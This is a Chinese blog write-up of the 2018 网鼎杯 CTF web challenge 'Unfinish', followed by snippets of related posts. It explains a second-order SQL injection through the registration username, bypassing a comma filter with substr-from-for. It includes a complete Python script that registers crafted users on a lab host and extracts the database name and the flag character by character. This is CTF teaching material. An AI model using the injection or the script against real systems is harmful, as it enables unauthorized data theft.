网鼎杯-2018-Web-Unfinish

已于 2024-08-12 11:12:51 修改
阅读量699 收藏 19
点赞数 24
文章标签: 数据库 安全
于 2024-08-12 09:52:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63050933/article/details/141120122
版权

先尝试万能注入:

如果万能注入缺少符号,如果加@符又进不去,那我们尝试扫描文件,然后发现有一个register.php的文件,应该是注册页面,我们去打开

 

知道存储的文件,并利用状态码进行过滤

我们注册的用户名就是aaa,可以看出它回显出来了,我们尝试从这个地方注入

 

测试发现过滤了逗号、information等,那么使用盲注应该不太行了

所以我们考虑用户名这里可能存在 二次注入 。

经过尝试,构造username=select database(),登录后显示用户名还是为select database(),说明后台代码可能把username用单引号引起来了,导致其无法显示。

因为题目中过滤掉了逗号,因此用from for来代替

ASCII码如下:

最后我们验证出数据库名为web

以下是我编写的python脚本,可以跑出数据库名称以及最终的flag

import requests

import time

from bs4 import BeautifulSoup       #html解析器

def getDatabase():

    database = ''

    for i in range(10):

        data_database = {

            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",

            'password':'admin',

            "email":"admin11@admin.com"+str(i)

        }

        #注册

        requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/register.php",data_database)

        login_data={

            'password':'admin',

            "email":"admin11@admin.com"+str(i)

        }

        response=requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/login.php",login_data)

        html=response.text                  #返回的页面

        soup=BeautifulSoup(html,'html.parser')

        getUsername=soup.find_all('span')[0]#获取用户名

        username=getUsername.text

        if int(username)==0:

            break

        database+=chr(int(username))

    return database

def getFlag():

    flag = ''

    for i in range(40):

        data_flag = {

            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",

            'password':'admin',

            "email":"admin32@admin.com"+str(i)

        }

        #注册

        requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/register.php",data_flag)

        login_data={

            'password':'admin',

            "email":"admin32@admin.com"+str(i)

        }

        response=requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/login.php",login_data)

        html=response.text                  #返回的页面

        soup=BeautifulSoup(html,'html.parser')

        getUsername=soup.find_all('span')[0]#获取用户名

        username=getUsername.text

        if int(username)==0:

            break

        flag+=chr(int(username))

    return flag

print(getDatabase())

print(getFlag())

最终得到flag

整不会了
关注
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1322
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[网鼎杯 2018] web题-Fakebook
BROTHERYY的博客
07-08 325
复现环境:buuoj.cn 扫描得到robots.txt flag.php 输入robots.txt访问 访问.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name;
[网鼎杯2018]Unfinish解题,五分钟带你解题
最新发布
m0_69151365的博客
08-05 766
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入点,然后开始扫描目录寻找其他注入点,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入点是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这种方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 502
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1268
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
[网鼎杯2018]Unfinish
m0_63045593的博客
04-20 235
[网鼎杯2018]Unfinish 盲猜register界面 打开看什么都没有、 二次注入类题目 绕过方法: ​ mysql中,+只能当做运算符。 ​ 执行select ‘1’+'1a’时 结果 执行select ‘0’+database(); 编程了0,但我们可以用ascii编码进行计算。select ‘0’+ascii(substr(database(),1,1)); 出来了库名第一位的ascii值。 回到题目 因为过滤了逗号,所以用from for来代替0’+ascii(substr(da
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 331
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 857
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
网鼎杯2018:登录页面SQL注入分析
"[网鼎杯 2018]unfinish.md" 这篇描述涉及到的是一个网络安全竞赛中的CTF(Capture The Flag)挑战,特别是关于SQL注入的题目。题目中给出的场景是一个登录页面`/login.php`,并且推测有一个注册页面`/register....
[网鼎杯]2018Unfinish
丁航航的博客
08-05 551
网鼎杯2018unfinsh
Buu - [网鼎杯2018]Unfinish
2302_79839194的博客
05-14 306
但同时,如果是 1’ or ‘1’='1 又能成功注册,这是肯定是单引号闭合,但是因为不能在后面跟注释符,如何进行闭合。解析:注册账号,将信息放在数据库中,登录进来比对数据库,将对应用户名拿出来回显在页面中。注入点在注册页面的用户名处,测试过滤了什么 => 单引号 语句后面跟注释符也被过滤。-> url/register.php => 有回显,可以注册账号。-> 注册完进来之后没有什么信息,能观察的就是左边有自己的用户名。流程:注册账号 -> 登录进来 -> 回显的是用户名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值